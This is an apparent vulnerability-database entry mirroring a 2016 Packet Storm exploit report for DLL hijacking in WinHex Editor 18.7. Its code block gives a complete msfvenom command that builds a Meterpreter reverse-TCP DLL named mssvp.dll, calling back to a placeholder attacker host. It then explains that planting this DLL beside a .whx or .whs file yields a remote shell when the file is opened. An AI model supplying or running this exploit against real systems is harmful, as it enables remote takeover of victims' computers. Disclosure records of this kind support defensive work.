Lucene search

K

Winhex Editor 18.7 DLL Hijacking

๐Ÿ—“๏ธย 30 Jan 2016ย 00:00:00Reported byย Shantanu KhandelwalTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 21ย Views

WinHex Editor 18.7 DLL hijacking vulnerabilit

Show more
Code
`# Exploit Title: WINHEX EDITOR DLL HIJACKING VULNERABILTY  
# Date: JAN 28 2016  
# Exploit Author: SHANTANU KHANDELWAL  
# Vendor Homepage: www.winhex.com  
# Software Link: http://www.winhex.com/winhex.zip  
# Version: <= 18.7  
# Tested on: WINDOWS XP 32 bit  
  
WinHEX suffers DLL HIJACK Vulnerability from file types .whs and .whx.  
  
Vulnerable DLL: mssvp.dll  
  
Make Malicious dll :  
  
msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<HOST IP>  
LPORT=4444 > mssvp.dll  
  
Exploit:  
Place a dummy .whx or .whs file with the malicious dll . When the fillw is opened in winhex editor you will get shell  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo